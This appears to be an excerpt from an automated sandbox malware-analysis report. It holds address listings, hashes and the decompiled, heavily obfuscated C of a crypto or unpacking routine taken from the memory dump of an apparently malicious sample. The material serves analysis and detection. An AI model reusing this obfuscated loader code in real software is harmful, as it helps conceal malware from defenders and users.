0x02275d25
0x02275d2c
0x02275d32
0x02275d32
0x02275d3c
0x02275d40
0x02275d43
0x02275d48
0x02275d52
0x02275d55
0x02275d5c
0x02275d5e
0x02275d61
0x02275d68
0x02275d6f
0x02275d74
0x02275d77
0x02275d7a
0x02275d7d
0x02275d7e
0x02275d85
0x02275d88
0x02275d8b
0x02275d8e
0x02275d91
0x02275d92
0x02275da4
0x02275da6
0x02275daa
0x02275314
0x00000000
0x0227531a
0x0227531a
0x02275320
0x0227532a
0x0227532d
0x02275333
0x0227533a
0x02275343
0x02275346
0x02275349
0x0227534c
0x0227534d
0x02275356
0x02275359
0x02275365
0x0227536c
0x02275372
0x02275372
0x02275445
0x02275445
0x02275448
0x0227544f
0x02275452
0x02275455
0x0227545d
0x02275464
0x0227546a
0x0227546b
0x0227546e
0x02275477
0x0227547a
0x02275480
0x02275487
0x0227548a
0x02275491
0x02275495
0x02275498
0x022754a0
0x022754a3
0x022754aa
0x022754ad
0x022754b0
0x022754b3
0x022754b4
0x022754b5
0x022754c4
0x022754c6
0x022754cb
0x022754cd
0x022754d6
0x022754d9
0x022754df
0x022754e6
0x022754e9
0x022754e9
0x022754ef
0x022754f7
0x022754fe
0x02275504
0x02275507
0x02275515
0x02275519
0x0227551d
0x02275520
0x02275527
0x0227552b
0x0227552e
0x02275535
0x02275539
0x0227553c
0x02275542
0x0227554a
0x02275551
0x02275557
0x0227555a
0x02275562
0x02275565
0x02275568
0x0227556b
0x0227556e
0x0227556f
0x02275576
0x02275579
0x0227557c
0x02275582
0x0227558c
0x02275595
0x02275596
0x02275599
0x0227559c
0x022755a2
0x022755a5
0x022755a8
0x022755ab
0x022755ad
0x022755b1
0x022755b4
0x022755bb
0x022755be
0x022755c1
0x022755c7
0x022755cf
0x022755d6
0x022755dc
0x022755e8
0x022755eb
0x022755ed
0x022755f0
0x022755f1
0x022755fb
0x022755fe
0x02275607
0x0227560a
0x02275611
0x02275614
0x02275617
0x0227561d
0x02275624
0x02275627
0x0227562f
0x02275632
0x02275635
0x0227563c
0x0227563d
0x02275640
0x0227564e
0x02275650
0x02275653
0x02275655
0x0227565b
0x02275662
0x02275665
0x0227566b
0x02275675
0x02275678
0x0227567e
0x02275685
0x0227568b
0x0227568b
0x02275694
0x0227569c
0x022756a0
0x022756a4
0x022756a6
0x022756a8
0x022756ac
0x022756af
0x022756b8
0x022756bb
0x022756c2
0x022756c6
0x022756c9
0x022756cf
0x022756d6
0x022756dc
0x022756e1
0x022756e4
0x022756e8
0x022756eb
0x022756ee
0x022756f4
0x022756fe
0x02275701
0x02275707
0x0227570f
0x02275716
0x0227571f
0x02275725
0x0227572f
0x02275732
0x02275738
0x02275742
0x02275745
0x0227574b
0x02275753
0x0227575a
0x02275760
0x0227576c
0x0227576f
0x02275777
0x0227577b
0x0227577e
0x02275781
0x0227578a
0x0227578d
0x02275794
0x02275797
0x0227579a
0x022757a0
0x022757a7
0x022757ad
0x00000000
0x022757ad
0x02275dbb
0x02275dbe
0x02275dd0
0x02275dd0
0x02275441

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86a651931a01c3be3bd58236517675960697cf91adc10e4db860c8d0544b250d
Instruction ID: 5f2cfa1b7c914e5cb5dac56a21ab88a37ecf080ea384750943a86d2c04ffbd41
Opcode Fuzzy Hash: 86a651931a01c3be3bd58236517675960697cf91adc10e4db860c8d0544b250d
Instruction Fuzzy Hash: B1724372844219DFEF04DFA0C989BEEBBF1FF08311F15486ED889AA145D7341664CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 022731B3, Relevance: .6, Instructions: 646
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E022731B3(signed int __ebx, signed int __edx, signed int __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t312;
				void* _t314;
				signed int _t315;
				signed int _t318;
				signed int _t321;
				void* _t323;
				void* _t327;
				void* _t331;
				void* _t333;
				void* _t334;
				signed int _t335;
				signed int _t337;
				void* _t339;
				void* _t340;
				signed int _t345;
				signed int _t348;
				void* _t350;
				void* _t351;
				signed int _t355;
				void* _t357;
				intOrPtr _t358;
				signed int _t359;
				signed int _t361;
				signed int _t365;
				signed int _t371;
				signed int _t373;
				void* _t378;
				void* _t380;
				signed int _t383;
				signed int _t386;
				intOrPtr _t390;
				signed int _t396;
				signed int _t398;
				signed int _t402;
				signed int _t405;
				void* _t408;
				void* _t410;
				signed int _t416;
				intOrPtr _t421;
				signed int _t426;
				intOrPtr _t429;
				intOrPtr _t434;
				signed int _t437;
				void* _t442;
				void* _t444;
				signed int _t446;
				signed int _t448;
				signed int _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int _t463;
				signed int _t465;
				signed int _t468;
				signed int _t473;
				signed int _t480;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t500;
				signed int _t502;
				signed int _t505;
				signed int _t507;
				signed int _t510;
				void* _t514;
				signed int _t516;
				signed int _t519;
				signed int _t522;
				signed int _t525;
				signed int _t531;
				signed int _t534;
				signed int _t537;
				signed int _t540;
				void* _t541;
				signed int _t543;
				signed int _t546;
				void* _t553;
				signed int _t555;
				signed int _t557;
				signed int _t560;
				signed int _t563;
				signed int _t566;
				void* _t570;
				signed int _t573;
				void* _t574;
				signed int _t576;
				signed int _t579;
				signed int* _t580;
				signed int* _t581;
				signed int* _t582;
				signed int* _t583;
				signed int* _t584;
				signed int* _t585;
				signed int* _t586;
				signed int* _t587;
				signed int* _t588;
				signed int* _t589;
				signed int* _t590;
				signed int* _t591;
				signed int* _t592;
				signed int* _t593;
				signed int* _t594;
				signed int* _t596;

				_t531 = __edi;
				_t500 = __edx;
				_t437 = __ebx;
				_t1 = _t437 + 0x41c972; // 0x41c972
				_push(_v16);
				 *_t580 = _t1;
				_t312 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_t573);
				 *_t580 =  *_t580 - _t573;
				 *_t580 = _t312;
				_t4 = _t437 + 0x41c726; // 0x41c726
				_v12 = 0;
				_push(_v12);
				 *_t580 =  *_t580 | _t4;
				_t314 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_t446 =  *_t580;
				_t581 =  &(_t580[1]);
				 *_t581 =  *_t581 + __esi;
				_t553 = _t314;
				_t315 = _t553 + _t446;
				_t555 = 0;
				_v16 = _t315;
				_t448 = _t446 & 0x00000000 | _t315 & 0x00000000 |  *(__ebx + 0x41c68d);
				_t318 = _v16;
				if(_t448 > _t318) {
					_t11 = _t437 + 0x41c972; // 0x41c972
					_v16 = 0;
					_push(_v16);
					 *_t581 =  *_t581 | _t11;
					_t14 = _t437 + 0x41c726; // 0x41c726
					_push(_t573);
					 *_t581 =  *_t581 - _t573;
					 *_t581 =  *_t581 ^ _t14;
					_t318 =  *((intOrPtr*)(__ebx + 0x41f064))();
				}
				_v12 = _t531;
				 *(_t437 + 0x41c3b5) =  *(_t437 + 0x41c3b5) & 0x00000000;
				 *(_t437 + 0x41c3b5) =  *(_t437 + 0x41c3b5) | _t531 & 0x00000000 ^ _t318;
				_t534 = _v12;
				_t22 = _t437 + 0x41d2f2; // 0x41d2f2
				 *_t581 =  *_t581 & 0x00000000;
				 *_t581 =  *_t581 + _t22;
				_t23 = _t437 + 0x41d08b; // 0x41d08b
				_v12 = _v12 & 0x00000000;
				 *_t581 =  *_t581 | _t23;
				_t321 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _t500);
				 *_t581 =  *_t581 & 0x00000000;
				 *_t581 =  *_t581 | _t321;
				_t28 = _t437 + 0x41c1f0; // 0x41c1f0
				 *_t581 =  *_t581 & 0x00000000;
				 *_t581 =  *_t581 | _t28;
				_t323 =  *((intOrPtr*)(_t437 + 0x41f060))(_t555);
				 *_t30 = _t448;
				 *_t581 =  *_t581 | _t573;
				_t574 = _t323;
				_t576 = 0;
				 *_t581 = _t574 + _v8;
				_t450 =  *(_t437 + 0x41c529);
				_t327 = 0;
				if(_t450 > _t327) {
					_t33 = _t437 + 0x41d08b; // 0x41d08b
					 *_t581 =  *_t581 ^ _t500;
					 *_t581 =  *_t581 ^ _t33;
					_t34 = _t437 + 0x41c1f0; // 0x41c1f0
					_v16 = 0;
					 *_t581 =  *_t581 | _t34;
					_t434 =  *((intOrPtr*)(_t437 + 0x41f064))(_v16, _t500);
					_v16 = _t450;
					 *((intOrPtr*)(_t437 + 0x41cd05)) = _t434;
					_t450 = _v16;
				}
				_t582 = _t581 - 0xfffffffc;
				 *_t582 =  *_t582 ^ _t576;
				 *_t582 =  *_t582 +  *_t581;
				_t41 = _t437 + 0x41d1b0; // 0x41d1b0
				 *_t582 =  *_t582 & 0x00000000;
				 *_t582 =  *_t582 + _t41;
				_t331 =  *((intOrPtr*)(_t437 + 0x41f060))(_t576, _t576);
				 *_t582 =  *_t582 & 0x00000000;
				 *_t582 =  *_t582 + _t331;
				_t43 = _t437 + 0x41c2f3; // 0x41c2f3
				 *_t582 =  *_t582 ^ _t555;
				 *_t582 =  *_t582 ^ _t43;
				_t333 =  *((intOrPtr*)(_t437 + 0x41f060))(_t555, _t500);
				_t452 = _t450 & 0x00000000 ^  *_t582;
				_t583 =  &(_t582[1]);
				 *_t45 = _t333;
				_v8 = _v8 + _t452;
				_push(_v8);
				_pop(_t334);
				_t502 = _t500;
				_v16 = _t502;
				_t454 = _t452 & 0x00000000 | _t502 & 0x00000000 |  *(_t437 + 0x41c51d);
				_t505 = _v16;
				if(_t454 > _t334) {
					_t52 = _t437 + 0x41d1b0; // 0x41d1b0
					 *_t583 =  *_t583 & 0x00000000;
					 *_t583 =  *_t583 ^ _t52;
					_t53 = _t437 + 0x41c2f3; // 0x41c2f3
					 *_t583 =  *_t583 - _t454;
					 *_t583 = _t53;
					_t334 =  *((intOrPtr*)(_t437 + 0x41f064))(_t454, _t505);
				}
				 *_t55 = _t334;
				_push(_v16);
				_pop( *_t57);
				_t335 =  *((intOrPtr*)(_t437 + 0x41f060))();
				_v16 = _v16 & 0x00000000;
				 *_t583 =  *_t583 ^ _t335;
				_t62 = _t437 + 0x41c0f2; // 0x41c0f2
				 *_t583 =  *_t583 - _t505;
				 *_t583 = _t62;
				_t337 =  *((intOrPtr*)(_t437 + 0x41f060))(_t505, _v16);
				 *_t583 = _t337;
				_t65 = _t437 + 0x41cfb1; // 0x41cfb1
				 *_t583 = _t65;
				_t339 =  *((intOrPtr*)(_t437 + 0x41f060))(_v8, _v16);
				_t584 = _t583 - 0xfffffffc;
				 *_t68 = _t339;
				_v16 = _v16 + (_t454 & 0x00000000 |  *_t583);
				_push(_v16);
				_pop(_t340);
				_t557 = _t555;
				_v8 = _t557;
				_t457 = 0 ^  *(_t437 + 0x41cba2);
				_t560 = _v8;
				if(_t457 > _t340) {
					_t75 = _t437 + 0x41c0f2; // 0x41c0f2
					_v16 = _v16 & 0x00000000;
					 *_t584 =  *_t584 ^ _t75;
					_t79 = _t437 + 0x41cfb1; // 0x41cfb1
					_v8 = _v8 & 0x00000000;
					 *_t584 =  *_t584 ^ _t79;
					_t429 =  *((intOrPtr*)(_t437 + 0x41f064))(_v8, _v16);
					_v8 = _t505;
					 *((intOrPtr*)(_t437 + 0x41cbd5)) = _t429;
					_t505 = _v8;
				}
				_pop( *_t87);
				 *_t584 =  *_t584 - _t534;
				 *_t584 =  *_t584 ^ 0 ^ _v8;
				_t89 = _t437 + 0x41cdc3; // 0x41cdc3
				_v8 = 0;
				 *_t584 =  *_t584 + _t89;
				_t92 = _t437 + 0x41c7d0; // 0x41c7d0
				_v16 = 0;
				 *_t584 =  *_t584 | _t92;
				_t345 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _v8, _t534);
				_v12 = _t457;
				 *(_t437 + 0x41cb83) =  *(_t437 + 0x41cb83) & 0x00000000;
				 *(_t437 + 0x41cb83) =  *(_t437 + 0x41cb83) ^ (_t457 - _v12 | _t345);
				_t103 = _t437 + 0x41d16f; // 0x41d16f
				_v16 = _v16 & 0x00000000;
				 *_t584 =  *_t584 ^ _t103;
				_t107 = _t437 + 0x41cd88; // 0x41cd88
				 *_t584 =  *_t584 & 0x00000000;
				 *_t584 =  *_t584 ^ _t107;
				_t348 =  *((intOrPtr*)(_t437 + 0x41f060))(_t505, _v16);
				_v16 = _v16 & 0x00000000;
				 *_t584 =  *_t584 ^ _t348;
				_t112 = _t437 + 0x41d272; // 0x41d272
				 *_t584 =  *_t584 & 0x00000000;
				 *_t584 =  *_t584 ^ _t112;
				_t350 =  *((intOrPtr*)(_t437 + 0x41f060))(_t437, _v16);
				_t585 = _t584 - 0xfffffffc;
				 *_t114 = _t350;
				_v16 = _v16 + (_v12 & 0x00000000) +  *_t584;
				_push(_v16);
				_pop(_t351);
				_t507 = _t505;
				 *_t585 = _t507;
				_t463 =  *(_t437 + 0x41c389);
				_t510 = 0;
				if(_t463 > _t351) {
					_t119 = _t437 + 0x41cd88; // 0x41cd88
					 *_t585 =  *_t585 & 0x00000000;
					 *_t585 =  *_t585 ^ _t119;
					_t120 = _t437 + 0x41d272; // 0x41d272
					 *_t585 =  *_t585 & 0x00000000;
					 *_t585 =  *_t585 ^ _t120;
					_t426 =  *((intOrPtr*)(_t437 + 0x41f064))(_t560, _t463);
					 *(_t437 + 0x41cc5a) =  *(_t437 + 0x41cc5a) & 0x00000000;
					 *(_t437 + 0x41cc5a) =  *(_t437 + 0x41cc5a) | _t463 & 0x00000000 | _t426;
					_t463 = _t463;
				}
				_t586 = _t585 - 0xfffffffc;
				 *_t586 = 0 ^  *_t585;
				_t127 = _t437 + 0x41cb2c; // 0x41cb2c
				 *_t586 =  *_t586 ^ _t437;
				 *_t586 =  *_t586 | _t127;
				_t355 =  *((intOrPtr*)(_t437 + 0x41f060))(_t437, _v16);
				_v8 = 0;
				 *_t586 =  *_t586 ^ _t355;
				_t131 = _t437 + 0x41ca15; // 0x41ca15
				_v12 = _v12 & 0x00000000;
				 *_t586 =  *_t586 | _t131;
				_t357 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v8);
				_t465 =  *_t586;
				_t587 = _t586 - 0xfffffffc;
				_v8 = _t534;
				_push(_t465 + _t357);
				_t537 = _v8;
				_pop(_t358);
				_t540 = _t537;
				if((_t465 & 0x00000000 | _t537 & 0x00000000 ^  *(_t437 + 0x41c82d)) > _t358) {
					_t139 = _t437 + 0x41cb2c; // 0x41cb2c
					_v16 = _v16 & 0x00000000;
					 *_t587 =  *_t587 + _t139;
					_t143 = _t437 + 0x41ca15; // 0x41ca15
					 *_t587 =  *_t587 & 0x00000000;
					 *_t587 =  *_t587 + _t143;
					_t358 =  *((intOrPtr*)(_t437 + 0x41f064))(_t560, _v16);
				}
				_v12 = _t560;
				 *((intOrPtr*)(_t437 + 0x41c92d)) = _t358;
				_t563 = _v12;
				_t359 =  *((intOrPtr*)(_t437 + 0x41f060))();
				 *_t587 =  *_t587 & 0x00000000;
				 *_t587 =  *_t587 | _t359;
				_t149 = _t437 + 0x41c69d; // 0x41c69d
				_v16 = 0;
				 *_t587 =  *_t587 | _t149;
				_t361 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _t563);
				_v12 = _t510;
				 *(_t437 + 0x41ccdd) =  *(_t437 + 0x41ccdd) & 0x00000000;
				 *(_t437 + 0x41ccdd) =  *(_t437 + 0x41ccdd) | _t510 - _v12 | _t361;
				_t588 =  &(_t587[1]);
				_pop( *_t160);
				_t468 = _v16;
				 *_t588 = (_t361 & 0x00000000) +  *_t587;
				 *_t588 = _t468;
				_t164 = _t437 + 0x41c2d3; // 0x41c2d3
				_v16 = _v16 & 0x00000000;
				 *_t588 =  *_t588 | _t164;
				_t365 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _v12, _v8);
				_v12 = _t468;
				 *(_t437 + 0x41d1f2) = _t365;
				_pop( *_t172);
				_t473 = _v12 & 0x00000000 | _v8;
				_pop( *_t174);
				 *_t588 = _v12;
				_push(_t365 & 0x00000000 ^ _v16);
				_pop(_t514);
				_t516 = 0;
				_v8 = 0;
				 *_t588 =  *_t588 | _t514 + _t473;
				_t178 = _t437 + 0x41d35c; // 0x41d35c
				 *_t588 = _t178;
				_t180 = _t437 + 0x41cffa; // 0x41cffa
				 *_t588 =  *_t588 ^ _t576;
				 *_t588 = _t180;
				_t371 =  *((intOrPtr*)(_t437 + 0x41f068))(_t576, _v12, _v8);
				_v12 = _t516;
				 *(_t437 + 0x41c7e6) =  *(_t437 + 0x41c7e6) & 0x00000000;
				 *(_t437 + 0x41c7e6) =  *(_t437 + 0x41c7e6) | _t516 - _v12 | _t371;
				_t519 = _v12;
				_t373 = 0 ^  *_t588;
				_t589 =  &(_t588[1]);
				_v8 = _t373;
				_v12 = 0;
				 *_t589 =  *_t589 + _v8;
				 *_t589 = _t473 & 0x00000000 ^ (_t373 - _v8 |  *(_t437 + 0x41d1e6));
				_t196 = _t437 + 0x41c887; // 0x41c887
				 *_t589 = _t196;
				_t378 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v8, _v12);
				_v12 = _v12 & 0x00000000;
				 *_t589 =  *_t589 + _t378;
				_t202 = _t437 + 0x41c411; // 0x41c411
				_v16 = 0;
				 *_t589 =  *_t589 + _t202;
				_t380 =  *((intOrPtr*)(_t437 + 0x41f060))(_v16, _v12);
				_t590 = _t589 - 0xfffffffc;
				 *_t590 =  *_t590 ^ _t540;
				_t541 = _t380;
				_t543 = 0;
				_v12 = _t563;
				_t566 = _v12;
				if((0 ^  *(_t437 + 0x41c39d)) > _t541 +  *_t589) {
					_t209 = _t437 + 0x41c887; // 0x41c887
					 *_t590 =  *_t590 & 0x00000000;
					 *_t590 =  *_t590 | _t209;
					_t210 = _t437 + 0x41c411; // 0x41c411
					_v12 = _v12 & 0x00000000;
					 *_t590 =  *_t590 | _t210;
					_t421 =  *((intOrPtr*)(_t437 + 0x41f064))(_v12, _t576);
					 *_t590 = _t543;
					 *((intOrPtr*)(_t437 + 0x41c9b5)) = _t421;
					_t543 = 0;
				}
				_t480 = 0 ^  *_t590;
				_t591 =  &(_t590[1]);
				_t383 =  *_t591;
				_t592 =  &(_t591[1]);
				if(_t480 > _t383) {
					_t216 = _t437 + 0x41d2f2; // 0x41d2f2
					_v16 = _v16 & 0x00000000;
					 *_t592 =  *_t592 ^ _t216;
					_t220 = _t437 + 0x41d16f; // 0x41d16f
					_v16 = 0;
					 *_t592 =  *_t592 ^ _t220;
					_t383 =  *((intOrPtr*)(_t437 + 0x41f064))(_v16, _v16);
				}
				 *_t592 = _t576;
				 *(_t437 + 0x41c0d6) = 0 ^ _t383;
				_t579 = 0;
				_v12 = _v12 & 0x00000000;
				 *_t592 =  *_t592 | _t566;
				_t228 = _t437 + 0x41cd35; // 0x41cd35
				 *_t592 =  *_t592 ^ _t480;
				 *_t592 =  *_t592 + _t228;
				_t229 = _t437 + 0x41ca62; // 0x41ca62
				_v16 = 0;
				 *_t592 =  *_t592 + _t229;
				_t386 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _t480, _v12);
				_v16 = _t543;
				 *(_t437 + 0x41cb3a) =  *(_t437 + 0x41cb3a) & 0x00000000;
				 *(_t437 + 0x41cb3a) =  *(_t437 + 0x41cb3a) ^ (_t543 - _v16 | _t386);
				_t546 = _v16;
				_t483 = _t480;
				_v12 = 0;
				 *_t592 =  *_t592 | _t386 & 0x00000000 ^ (_t480 & 0x00000000 | _a4);
				_t243 = _t437 + 0x41c84c; // 0x41c84c
				_v12 = _v12 & 0x00000000;
				 *_t592 =  *_t592 | _t243;
				_t390 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v12);
				_v16 = _t519;
				 *((intOrPtr*)(_t437 + 0x41d2c7)) = _t390;
				_t522 = _v16;
				_t593 = _t592 - 0xfffffffc;
				 *_t593 =  *_t593 - _t437;
				 *_t593 =  *_t592 - 1;
				_t251 = _t437 + 0x41ceef; // 0x41ceef
				_v16 = 0;
				 *_t593 =  *_t593 | _t251;
				_t254 = _t437 + 0x41c9c8; // 0x41c9c8
				 *_t593 =  *_t593 - _t522;
				 *_t593 = _t254;
				_t396 =  *((intOrPtr*)(_t437 + 0x41f068))(_t522, _v16, _t437);
				_v16 = _t522;
				 *(_t437 + 0x41d00d) =  *(_t437 + 0x41d00d) & 0x00000000;
				 *(_t437 + 0x41d00d) =  *(_t437 + 0x41d00d) | _t522 ^ _v16 | _t396;
				_t525 = _v16;
				_t398 =  *_t593;
				_t594 = _t593 - 0xfffffffc;
				if(_t398 > 0) {
					if(_a12 != 0) {
						_t402 = _t398;
						 *_t301 = _t483 & 0x00000000 | _t398 ^  *_t594 ^ _a12;
						_v12 = _v12 + _t402;
						_push(_v12);
						_pop(_t486);
						_t570 = _t566;
						 *_t594 =  *_t594 ^ _t486;
						_t487 = _t437;
						_t488 = _t487 & _a8;
						 *_t306 = _t570;
						_v8 = _v8 + _t488;
						_push(_v8);
						_pop(_t566);
						_t437 = _t437;
						 *_t594 =  *_t594 & 0x00000000;
						 *_t594 =  *_t594 + _t566;
						 *_t594 =  *_t594 ^ _t579;
						 *_t594 =  *_t594 ^ _t488;
						 *_t594 = _t402;
						_t398 = E022731B3(_t437, _t525, _t546, _t566, _v16, _t579, _t488);
					}
					_push(_t437);
					return _t398 ^ _t398;
				} else {
					 *_t594 =  *_t594 & 0x00000000;
					 *_t594 =  *_t594 | _t398;
					_t263 = _t437 + 0x41cfc3; // 0x41cfc3
					_v16 = _v16 & 0x00000000;
					 *_t594 =  *_t594 ^ _t263;
					_t267 = _t437 + 0x41c769; // 0x41c769
					 *_t594 =  *_t594 & 0x00000000;
					 *_t594 =  *_t594 ^ _t267;
					_t405 =  *((intOrPtr*)(_t437 + 0x41f068))(_v16, _t483);
					_v16 = _t483;
					 *(_t437 + 0x41d0ea) =  *(_t437 + 0x41d0ea) & 0x00000000;
					 *(_t437 + 0x41d0ea) =  *(_t437 + 0x41d0ea) ^ (_t483 & 0x00000000 | _t405);
					 *_t275 = _t525;
					_t596 = _t594 - 0xfffffffc;
					 *_t596 =  *_t596 - _t437;
					 *_t596 =  *_t596 | _v16;
					_t277 = _t437 + 0x41cd95; // 0x41cd95
					 *_t596 =  *_t596 ^ _t525;
					 *_t596 = _t277;
					_t408 =  *((intOrPtr*)(_t437 + 0x41f060))(_t525, _t437);
					 *_t596 =  *_t596 & 0x00000000;
					 *_t596 =  *_t596 + _t408;
					_t279 = _t437 + 0x41cbf8; // 0x41cbf8
					 *_t596 = _t279;
					_t410 =  *((intOrPtr*)(_t437 + 0x41f060))(_v12, _v16);
					_pop( *_t282);
					 *_t596 = _t437;
					_t442 = _t410;
					_t444 = 0;
					_push(_t546);
					if((0 + _v12 & 0x00000000 ^ (_t546 ^  *_t596 |  *(_t444 + 0x41c691))) > _t442 + 0 + _v12) {
						_t285 = _t444 + 0x41cd95; // 0x41cd95
						 *_t596 = _t285;
						_t287 = _t444 + 0x41cbf8; // 0x41cbf8
						_v12 = _v12 & 0x00000000;
						 *_t596 =  *_t596 | _t287;
						_t416 =  *((intOrPtr*)(_t444 + 0x41f064))(_v12, _v16);
						_v8 = _t525;
						 *(_t444 + 0x41d309) =  *(_t444 + 0x41d309) & 0x00000000;
						 *(_t444 + 0x41d309) =  *(_t444 + 0x41d309) | _t525 ^ _v8 | _t416;
					}
					return  *_t596;
				}
			}

0x022731b3
0x022731b3
0x022731b3
0x022731b9
0x022731bf
0x022731c2
0x022731c5
0x022731cb
0x022731cc
0x022731cf
0x022731d2
0x022731d8
0x022731df
0x022731e2
0x022731e5
0x022731ed
0x022731f0
0x022731f5
0x022731f9
0x022731fc
0x022731fe
0x022731ff
0x0227320e
0x02273210
0x02273215
0x02273217
0x0227321d
0x02273224
0x02273227
0x0227322a
0x02273230
0x02273231
0x02273234
0x02273237
0x02273237
0x0227323d
0x02273245
0x0227324c
0x02273252
0x02273255
0x0227325c
0x02273260
0x02273263
0x02273269
0x02273270
0x02273273
0x0227327a
0x0227327e
0x02273281
0x02273288
0x0227328c
0x0227328f
0x02273295
0x0227329d
0x022732a1
0x022732a6
0x022732a9
0x022732b4
0x022732b6
0x022732b9
0x022732bb
0x022732c2
0x022732c5
0x022732c8
0x022732ce
0x022732d8
0x022732db
0x022732e1
0x022732e8
0x022732ee
0x022732ee
0x022732f6
0x022732fa
0x022732fd
0x02273300
0x02273307
0x0227330b
0x0227330e
0x02273315
0x02273319
0x0227331c
0x02273323
0x02273326
0x02273329
0x02273335
0x02273338
0x0227333f
0x02273342
0x02273345
0x02273348
0x02273349
0x0227334a
0x02273359
0x0227335b
0x02273360
0x02273362
0x02273369
0x0227336d
0x02273370
0x02273377
0x0227337a
0x0227337d
0x0227337d
0x02273384
0x02273387
0x0227338a
0x02273390
0x02273396
0x0227339d
0x022733a0
0x022733a7
0x022733aa
0x022733ad
0x022733b6
0x022733b9
0x022733c2
0x022733c5
0x022733d4
0x022733db
0x022733de
0x022733e1
0x022733e4
0x022733e5
0x022733e6
0x022733f1
0x022733f3
0x022733f8
0x022733fa
0x02273400
0x02273407
0x0227340a
0x02273410
0x02273417
0x0227341a
0x02273420
0x02273427
0x0227342d
0x0227342d
0x02273432
0x02273439
0x0227343c
0x0227343f
0x02273445
0x0227344f
0x02273452
0x02273458
0x02273462
0x02273465
0x0227346b
0x02273473
0x0227347a
0x02273483
0x02273489
0x02273490
0x02273493
0x0227349a
0x0227349e
0x022734a1
0x022734a7
0x022734ae
0x022734b1
0x022734b8
0x022734bc
0x022734bf
0x022734ce
0x022734d5
0x022734d8
0x022734db
0x022734de
0x022734df
0x022734e2
0x022734ed
0x022734ef
0x022734f2
0x022734f4
0x022734fb
0x022734ff
0x02273502
0x02273509
0x0227350d
0x02273510
0x0227351c
0x02273523
0x02273529
0x02273529
0x0227352f
0x02273535
0x02273538
0x0227353f
0x02273542
0x02273545
0x0227354b
0x02273555
0x02273558
0x0227355e
0x02273565
0x02273568
0x02273574
0x02273577
0x0227357a
0x02273581
0x02273582
0x02273585
0x02273595
0x02273598
0x0227359a
0x022735a0
0x022735a7
0x022735aa
0x022735b1
0x022735b5
0x022735b8
0x022735b8
0x022735be
0x022735c5
0x022735cb
0x022735ce
0x022735d5
0x022735d9
0x022735dc
0x022735e2
0x022735ec
0x022735ef
0x022735f5
0x022735fd
0x02273604
0x02273616
0x02273619
0x0227361c
0x02273622
0x02273628
0x0227362b
0x02273631
0x02273638
0x0227363b
0x02273641
0x02273648
0x02273657
0x0227365a
0x02273663
0x0227366b
0x0227366e
0x0227366f
0x02273674
0x02273675
0x0227367f
0x02273682
0x0227368b
0x0227368e
0x02273695
0x02273698
0x0227369b
0x022736a1
0x022736a9
0x022736b0
0x022736b6
0x022736bb
0x022736be
0x022736c1
0x022736d5
0x022736df
0x022736e5
0x022736e8
0x022736f1
0x022736f4
0x022736fa
0x02273701
0x02273704
0x0227370a
0x02273714
0x02273717
0x02273722
0x02273727
0x0227372b
0x02273730
0x02273731
0x0227373e
0x02273743
0x02273745
0x0227374c
0x02273750
0x02273753
0x02273759
0x02273760
0x02273763
0x0227376b
0x02273772
0x02273778
0x02273778
0x0227377b
0x0227377e
0x02273783
0x02273786
0x0227378b
0x0227378d
0x02273793
0x0227379a
0x0227379d
0x022737a3
0x022737ad
0x022737b0
0x022737b0
0x022737b8
0x022737bf
0x022737c5
0x022737c6
0x022737cd
0x022737d0
0x022737d7
0x022737da
0x022737dd
0x022737e3
0x022737ed
0x022737f0
0x022737f6
0x022737fe
0x02273805
0x0227380b
0x0227381a
0x0227381b
0x02273825
0x02273828
0x0227382e
0x02273835
0x02273838
0x0227383e
0x02273845
0x0227384b
0x02273853
0x02273858
0x0227385b
0x0227385e
0x02273864
0x0227386e
0x02273871
0x02273878
0x0227387b
0x0227387e
0x02273884
0x0227388c
0x02273893
0x02273899
0x022738a2
0x022738a5
0x022738ab
0x022739ad
0x022739bb
0x022739c0
0x022739c3
0x022739c6
0x022739c9
0x022739ca
0x022739cc
0x022739cf
0x022739d0
0x022739d7
0x022739da
0x022739dd
0x022739e0
0x022739e1
0x022739e3
0x022739e7
0x022739eb
0x022739ee
0x022739f4
0x022739f7
0x022739f7
0x022739fc
0x02273a11
0x022738b1
0x022738b2
0x022738b6
0x022738b9
0x022738bf
0x022738c6
0x022738c9
0x022738d0
0x022738d4
0x022738d7
0x022738dd
0x022738e5
0x022738ec
0x022738f5
0x02273904
0x02273908
0x0227390b
0x0227390e
0x02273915
0x02273918
0x0227391b
0x02273922
0x02273926
0x02273929
0x02273932
0x02273935
0x0227393d
0x02273945
0x02273949
0x0227394e
0x0227394f
0x02273961
0x02273963
0x0227396c
0x0227396f
0x02273975
0x0227397c
0x0227397f
0x02273985
0x0227398d
0x02273994
0x0227399a
0x022739a6
0x022739a6

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41702c0559bb7f5a073f0754972d7e78843a10d494ddda559bbe32eb0d58a14d
Instruction ID: 2fa768b4a52adc22bc542cf37722bd4a401f35794cf1b29f9166002ed3809bb6
Opcode Fuzzy Hash: 41702c0559bb7f5a073f0754972d7e78843a10d494ddda559bbe32eb0d58a14d
Instruction Fuzzy Hash: 43521572948608EFEB04DFA4C88A7ADBBF1FF08310F1585ADD885EA145D7345664CF19

Uniqueness

Uniqueness Score: -1.00%

Function 02273FAB, Relevance: .6, Instructions: 566
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

